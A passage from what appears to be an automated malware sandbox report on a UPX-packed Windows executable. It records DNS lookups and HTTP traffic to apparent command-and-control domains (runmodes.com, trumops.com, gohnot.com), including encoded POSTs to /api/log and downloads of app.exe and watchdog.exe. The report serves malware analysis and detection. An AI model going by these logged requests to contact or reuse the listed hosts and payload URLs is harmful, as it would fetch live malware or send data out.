IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x2d0000 | 0x0 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1 | 0x2d1000 | 0x200000 | 0x1ff600 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
UPX2 | 0x4d1000 | 0x1000 | 0x200 | False | 0.193359375 | data | 1.38215794943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL | Import
KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect

Network Behavior

Network Port Distribution

TCP Packets


UDP Packets


                                                                                                  DNS Queries

                                                                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                                                  Nov 4, 2021 13:12:36.531829119 CET | 192.168.2.3 | 8.8.8.8 | 0xb82a | Standard query (0) | runmodes.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.693613052 CET | 192.168.2.3 | 8.8.8.8 | 0x3507 | Standard query (0) | runmodes.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.835752010 CET | 192.168.2.3 | 8.8.8.8 | 0xde8f | Standard query (0) | runmodes.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.984076023 CET | 192.168.2.3 | 8.8.8.8 | 0x3676 | Standard query (0) | runmodes.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.214611053 CET | 192.168.2.3 | 8.8.8.8 | 0x4ddd | Standard query (0) | trumops.com | 16 | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.248415947 CET | 192.168.2.3 | 8.8.8.8 | 0x22d2 | Standard query (0) | server16.trumops.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:38.957103968 CET | 192.168.2.3 | 8.8.8.8 | 0xbc27 | Standard query (0) | gohnot.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:40.144921064 CET | 192.168.2.3 | 8.8.8.8 | 0x3562 | Standard query (0) | runmodes.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:43.418806076 CET | 192.168.2.3 | 8.8.8.8 | 0x178e | Standard query (0) | runmodes.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.565668106 CET | 192.168.2.3 | 8.8.8.8 | 0xf797 | Standard query (0) | trumops.com | 16 | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.593276024 CET | 192.168.2.3 | 8.8.8.8 | 0xf41e | Standard query (0) | logs.trumops.com | 16 | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.621603012 CET | 192.168.2.3 | 8.8.8.8 | 0xf287 | Standard query (0) | 442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com | 16 | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.713522911 CET | 192.168.2.3 | 8.8.8.8 | 0xb9c3 | Standard query (0) | runmodes.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.818048954 CET | 192.168.2.3 | 8.8.8.8 | 0x65b0 | Standard query (0) | server2.trumops.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:15.786428928 CET | 192.168.2.3 | 8.8.8.8 | 0xc8f1 | Standard query (0) | server2.trumops.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:16.257272959 CET | 192.168.2.3 | 8.8.8.8 | 0xae69 | Standard query (0) | runmodes.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:28.847537994 CET | 192.168.2.3 | 8.8.8.8 | 0x3644 | Standard query (0) | server2.trumops.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:28.992549896 CET | 192.168.2.3 | 8.8.8.8 | 0xc23a | Standard query (0) | gohnot.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:31.363845110 CET | 192.168.2.3 | 8.8.8.8 | 0xe7aa | Standard query (0) | e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com | 16 | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:37.962714911 CET | 192.168.2.3 | 8.8.8.8 | 0xa88f | Standard query (0) | runmodes.com | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:14:04.148565054 CET | 192.168.2.3 | 8.8.8.8 | 0xc84c | Standard query (0) | server2.trumops.com | A (IP address) | IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                                                  Nov 4, 2021 13:12:36.551266909 CET | 8.8.8.8 | 192.168.2.3 | 0xb82a | No error (0) | runmodes.com |  | 172.67.207.136 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.551266909 CET | 8.8.8.8 | 192.168.2.3 | 0xb82a | No error (0) | runmodes.com |  | 104.21.34.203 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.713059902 CET | 8.8.8.8 | 192.168.2.3 | 0x3507 | No error (0) | runmodes.com |  | 172.67.207.136 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.713059902 CET | 8.8.8.8 | 192.168.2.3 | 0x3507 | No error (0) | runmodes.com |  | 104.21.34.203 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.859380960 CET | 8.8.8.8 | 192.168.2.3 | 0xde8f | No error (0) | runmodes.com |  | 172.67.207.136 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:36.859380960 CET | 8.8.8.8 | 192.168.2.3 | 0xde8f | No error (0) | runmodes.com |  | 104.21.34.203 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.009023905 CET | 8.8.8.8 | 192.168.2.3 | 0x3676 | No error (0) | runmodes.com |  | 172.67.207.136 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.009023905 CET | 8.8.8.8 | 192.168.2.3 | 0x3676 | No error (0) | runmodes.com |  | 104.21.34.203 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.239144087 CET | 8.8.8.8 | 192.168.2.3 | 0x4ddd | No error (0) | trumops.com |  |  | TXT (Text strings) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.270955086 CET | 8.8.8.8 | 192.168.2.3 | 0x22d2 | No error (0) | server16.trumops.com |  | 172.67.139.144 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:37.270955086 CET | 8.8.8.8 | 192.168.2.3 | 0x22d2 | No error (0) | server16.trumops.com |  | 104.21.79.9 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:38.978027105 CET | 8.8.8.8 | 192.168.2.3 | 0xbc27 | No error (0) | gohnot.com |  | 104.21.92.165 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:38.978027105 CET | 8.8.8.8 | 192.168.2.3 | 0xbc27 | No error (0) | gohnot.com |  | 172.67.196.11 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:40.164143085 CET | 8.8.8.8 | 192.168.2.3 | 0x3562 | No error (0) | runmodes.com |  | 172.67.207.136 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:40.164143085 CET | 8.8.8.8 | 192.168.2.3 | 0x3562 | No error (0) | runmodes.com |  | 104.21.34.203 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:43.438608885 CET | 8.8.8.8 | 192.168.2.3 | 0x178e | No error (0) | runmodes.com |  | 172.67.207.136 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:12:43.438608885 CET | 8.8.8.8 | 192.168.2.3 | 0x178e | No error (0) | runmodes.com |  | 104.21.34.203 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.588268995 CET | 8.8.8.8 | 192.168.2.3 | 0xf797 | No error (0) | trumops.com |  |  | TXT (Text strings) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.616501093 CET | 8.8.8.8 | 192.168.2.3 | 0xf41e | No error (0) | logs.trumops.com |  |  | TXT (Text strings) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.643345118 CET | 8.8.8.8 | 192.168.2.3 | 0xf287 | Name error (3) | 442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com | none | none | 16 | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.734728098 CET | 8.8.8.8 | 192.168.2.3 | 0xb9c3 | No error (0) | runmodes.com |  | 172.67.207.136 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.734728098 CET | 8.8.8.8 | 192.168.2.3 | 0xb9c3 | No error (0) | runmodes.com |  | 104.21.34.203 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.840814114 CET | 8.8.8.8 | 192.168.2.3 | 0x65b0 | No error (0) | server2.trumops.com |  | 104.21.79.9 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:06.840814114 CET | 8.8.8.8 | 192.168.2.3 | 0x65b0 | No error (0) | server2.trumops.com |  | 172.67.139.144 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:15.811979055 CET | 8.8.8.8 | 192.168.2.3 | 0xc8f1 | No error (0) | server2.trumops.com |  | 172.67.139.144 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:15.811979055 CET | 8.8.8.8 | 192.168.2.3 | 0xc8f1 | No error (0) | server2.trumops.com |  | 104.21.79.9 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:16.277537107 CET | 8.8.8.8 | 192.168.2.3 | 0xae69 | No error (0) | runmodes.com |  | 172.67.207.136 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:16.277537107 CET | 8.8.8.8 | 192.168.2.3 | 0xae69 | No error (0) | runmodes.com |  | 104.21.34.203 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:28.868427038 CET | 8.8.8.8 | 192.168.2.3 | 0x3644 | No error (0) | server2.trumops.com |  | 104.21.79.9 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:28.868427038 CET | 8.8.8.8 | 192.168.2.3 | 0x3644 | No error (0) | server2.trumops.com |  | 172.67.139.144 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:29.014751911 CET | 8.8.8.8 | 192.168.2.3 | 0xc23a | No error (0) | gohnot.com |  | 104.21.92.165 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:29.014751911 CET | 8.8.8.8 | 192.168.2.3 | 0xc23a | No error (0) | gohnot.com |  | 172.67.196.11 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:31.386565924 CET | 8.8.8.8 | 192.168.2.3 | 0xe7aa | No error (0) | e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com |  |  | TXT (Text strings) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:37.981930971 CET | 8.8.8.8 | 192.168.2.3 | 0xa88f | No error (0) | runmodes.com |  | 172.67.207.136 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:13:37.981930971 CET | 8.8.8.8 | 192.168.2.3 | 0xa88f | No error (0) | runmodes.com |  | 104.21.34.203 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:14:04.171608925 CET | 8.8.8.8 | 192.168.2.3 | 0xc84c | No error (0) | server2.trumops.com |  | 104.21.79.9 | A (IP address) | IN (0x0001)
                                                                                                  Nov 4, 2021 13:14:04.171608925 CET | 8.8.8.8 | 192.168.2.3 | 0xc84c | No error (0) | server2.trumops.com |  | 172.67.139.144 | A (IP address) | IN (0x0001)

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • runmodes.com
                                                                                                  • server16.trumops.com
                                                                                                  • server2.trumops.com
                                                                                                  • gohnot.com

                                                                                                  HTTP Packets

                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  0 | 192.168.2.3 | 49749 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  1 | 192.168.2.3 | 49750 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  10 | 192.168.2.3 | 49762 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  11 | 192.168.2.3 | 49765 | 104.21.79.9 | 443 | C:\Windows\rss\csrss.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  12 | 192.168.2.3 | 49802 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  13 | 192.168.2.3 | 49831 | 104.21.79.9 | 443 | C:\Windows\rss\csrss.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  14 | 192.168.2.3 | 49754 | 104.21.92.165 | 80 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                  Nov 4, 2021 13:12:38.997127056 CET | 1079 | OUT | GET /d28daa3fb329cff58b19acdf478b7882/app.exe HTTP/1.1
                                                                                                  Host: gohnot.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Uuid:
                                                                                                  Accept-Encoding: gzip
                                                                                                  Nov 4, 2021 13:12:39.026179075 CET | 1080 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:12:39 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 3788288
                                                                                                  Connection: keep-alive
                                                                                                  content-disposition: attachment; filename=app.exe
                                                                                                  etag: "616ea4c2-39ce00"
                                                                                                  last-modified: Tue, 19 Oct 2021 10:58:10 GMT
                                                                                                  Cache-Control: max-age=3600
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 726
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aGUDRkZW12WFb0Z1WtbDazJRsyQjmf37XuogvaYwPWl6MnjPMl4eqYDp2G4rixUdVCHSJNAij3d%2BJyafZy7nG%2FpPEkNqHIpND7MIWu%2Fkz1fTe%2FgV6DrKP1Wv8esq"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Vary: Accept-Encoding
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc077cd066933-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$90R @R@ UPX00RUPX19@R9@UPX29@


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  15 | 192.168.2.3 | 49767 | 104.21.92.165 | 80 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                  Nov 4, 2021 13:13:29.038016081 CET | 5537 | OUT | GET /d28daa3fb329cff58b19acdf478b7882/watchdog.exe HTTP/1.1
                                                                                                  Host: gohnot.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Uuid: 442b90d2-fde4-485f-a003-6086e2191d6e
                                                                                                  Version: 183
                                                                                                  Accept-Encoding: gzip
                                                                                                  Nov 4, 2021 13:13:29.097462893 CET | 5542 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:13:29 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 2102272
                                                                                                  Connection: keep-alive
                                                                                                  content-disposition: attachment; filename=watchdog.exe
                                                                                                  etag: "616ea494-201400"
                                                                                                  last-modified: Tue, 19 Oct 2021 10:57:24 GMT
                                                                                                  Cache-Control: max-age=3600
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 802
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yf%2BGD8l7373ZeZ%2Bx2Q1xpl%2FgZXFhtKWeXRYuOa7bn%2FvVZo559VS4xe2flpcsnosSzS0Rx9wZavPEonRFgpdfi6r8EDDYvPMTxUa18GxPfvjXzcqZC%2B2iZbRyMbg4"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Vary: Accept-Encoding
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc1b08ff06913-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  2 | 192.168.2.3 | 49751 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  3 | 192.168.2.3 | 49752 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  4 | 192.168.2.3 | 49753 | 172.67.139.144 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  5 | 192.168.2.3 | 49755 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  6 | 192.168.2.3 | 49756 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  7 | 192.168.2.3 | 49759 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  8 | 192.168.2.3 | 49760 | 104.21.79.9 | 443 | C:\Windows\rss\csrss.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  9 | 192.168.2.3 | 49761 | 172.67.139.144 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                                  HTTPS Proxied Packets

                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  0 | 192.168.2.3 | 49749 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                  2021-11-04 12:12:36 UTC | 0 | OUT | POST /api/log HTTP/1.1
                                                                                                  Host: runmodes.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Content-Length: 192
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:12:36 UTC0OUTData Raw: 54 78 49 43 33 6a 65 6d 33 31 6f 44 65 4c 42 63 61 70 47 58 51 58 4e 56 6b 43 31 2b 6f 6e 52 58 72 31 4a 61 30 2b 51 64 62 57 57 34 4d 4e 32 71 72 54 57 37 49 63 38 4a 59 79 50 50 37 52 2f 32 6f 74 71 76 2f 6c 49 36 55 47 6b 6b 47 74 2b 50 62 74 47 71 68 4b 52 79 47 71 6a 77 5a 66 37 2f 78 45 78 7a 7a 44 78 52 76 33 4f 54 38 44 59 2b 73 55 49 74 2f 51 4f 4a 34 54 70 54 6a 6a 6b 32 62 4d 32 69 34 63 52 65 46 71 4d 72 67 58 2b 45 57 35 70 6e 42 41 75 4b 47 4a 79 2b 6f 61 67 49 36 42 70 76 4a 67 4e 43 74 4c 67 6f 75 42 58 53 6d 79 7a 59 67 4b 78 65 4d 55 62 6d 65 41 3d 3d
                                                                                                  Data Ascii: TxIC3jem31oDeLBcapGXQXNVkC1+onRXr1Ja0+QdbWW4MN2qrTW7Ic8JYyPP7R/2otqv/lI6UGkkGt+PbtGqhKRyGqjwZf7/xExzzDxRv3OT8DY+sUIt/QOJ4TpTjjk2bM2i4cReFqMrgX+EW5pnBAuKGJy+oagI6BpvJgNCtLgouBXSmyzYgKxeMUbmeA==
                                                                                                  2021-11-04 12:12:36 UTC0INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:12:36 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qhX8wR370PslmQXquhv39Sv5LSwdUlU9nUqje2rkW8YlsEqvOX9XgDucMAxEfC7PY1ND0OhaN1KL8CyOfQpASgW76S6WwqCPFyyjzanxRtrTgTK9jq1ZI7molXDeDsY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc068e97e5c38-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49750 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
Timestamp | kBytes transferred | Direction | Data
2021-11-04 12:12:36 UTC | 1 | OUT | POST /api/log HTTP/1.1
    Host: runmodes.com
    User-Agent: Go-http-client/1.1
    Content-Length: 160
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
2021-11-04 12:12:36 UTC | 1 | OUT | Data Raw: 51 4f 69 79 38 46 2f 54 6d 64 74 50 35 62 38 50 58 76 64 6c 47 68 34 55 38 57 63 6c 70 4e 76 39 54 78 31 54 38 2b 63 75 58 34 57 6f 6b 65 43 61 4c 5a 2f 47 5a 6d 6a 56 70 74 36 47 4f 65 58 76 50 37 7a 43 45 66 75 54 71 42 76 35 78 34 45 4c 44 7a 78 4a 7a 78 37 50 4f 75 78 59 77 6b 72 67 70 59 57 38 69 50 35 6d 30 77 7a 51 42 47 76 33 66 76 48 4c 6b 6c 65 48 4c 6b 2b 33 6d 5a 6d 4c 42 63 52 75 75 6c 4a 45 74 54 55 6a 6b 55 75 38 74 38 64 30 41 6d 68 35 62 36 4b 56 73 41 3d 3d
    Data Ascii: QOiy8F/TmdtP5b8PXvdlGh4U8WclpNv9Tx1T8+cuX4WokeCaLZ/GZmjVpt6GOeXvP7zCEfuTqBv5x4ELDzxJzx7POuxYwkrgpYW8iP5m0wzQBGv3fvHLkleHLk+3mZmLBcRuulJEtTUjkUu8t8d0Amh5b6KVsA==
2021-11-04 12:12:36 UTC | 1 | IN | HTTP/1.1 200 OK
    Date: Thu, 04 Nov 2021 12:12:36 GMT
    Content-Length: 0
    Connection: close
    CF-Cache-Status: DYNAMIC
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Gtznp3GukB8jHlP3ZiFMylTeJpzrhl%2BJ12U9ChkEaySrJ2wPrBK5ercfk%2F4NuE9KvsRYYfksPhIXAI%2BzbhWfuyzofB33gpLrW6ezcoBdKehrrtDGU%2BsosyXwd7fE%2BDE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6a8dc069ee8a68e9-FRA
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49762 | 172.67.207.136 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
Timestamp | kBytes transferred | Direction | Data
2021-11-04 12:13:16 UTC | 31 | OUT | POST /api/log HTTP/1.1
    Host: runmodes.com
    User-Agent: Go-http-client/1.1
    Content-Length: 132
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
2021-11-04 12:13:16 UTC | 31 | OUT | Data Raw: 2f 6b 62 72 65 35 48 6e 6d 42 42 6e 59 2f 52 41 2f 78 4e 4e 6d 6e 72 68 6d 31 44 59 4f 36 41 38 7a 4c 72 4c 34 6e 49 37 55 39 6d 4c 4e 2f 2f 4a 44 4d 61 6c 41 46 34 75 46 43 4a 38 59 68 69 4c 33 62 2f 47 39 64 45 32 4f 32 49 45 47 35 31 31 4a 44 43 69 58 70 44 43 47 4b 75 67 78 77 67 7a 4c 4b 58 54 32 6c 4f 42 38 62 4a 70 53 36 70 35 57 65 48 7a 6d 55 6d 5a 44 33 66 2b 4c 4d 78 5a 6d 77 3d 3d
    Data Ascii: /kbre5HnmBBnY/RA/xNNmnrhm1DYO6A8zLrL4nI7U9mLN//JDMalAF4uFCJ8YhiL3b/G9dE2O2IEG511JDCiXpDCGKugxwgzLKXT2lOB8bJpS6p5WeHzmUmZD3f+LMxZmw==
2021-11-04 12:13:16 UTC | 31 | IN | HTTP/1.1 200 OK
    Date: Thu, 04 Nov 2021 12:13:16 GMT
    Content-Length: 0
    Connection: close
    CF-Cache-Status: DYNAMIC
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eFlHTIFYWHXdcPPlTu0qH5d5xDX1fG2WhjjxxsU1RClqWIPfeGw%2BSqSuu5UeJoVB7bANX%2Fc5K5eFYpWwpCDM7sOMff48jsYhQnFZb9knRIh85lqyntRIFjXWTGBBHBM%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6a8dc16138605cb0-FRA
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49765 | 104.21.79.9 | 443 | C:\Windows\rss\csrss.exe
Timestamp | kBytes transferred | Direction | Data
2021-11-04 12:13:28 UTC | 32 | OUT | GET /api/cdn?c=fa2e76e6e1aa03da&uuid=442b90d2-fde4-485f-a003-6086e2191d6e HTTP/1.1
    Host: server2.trumops.com
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
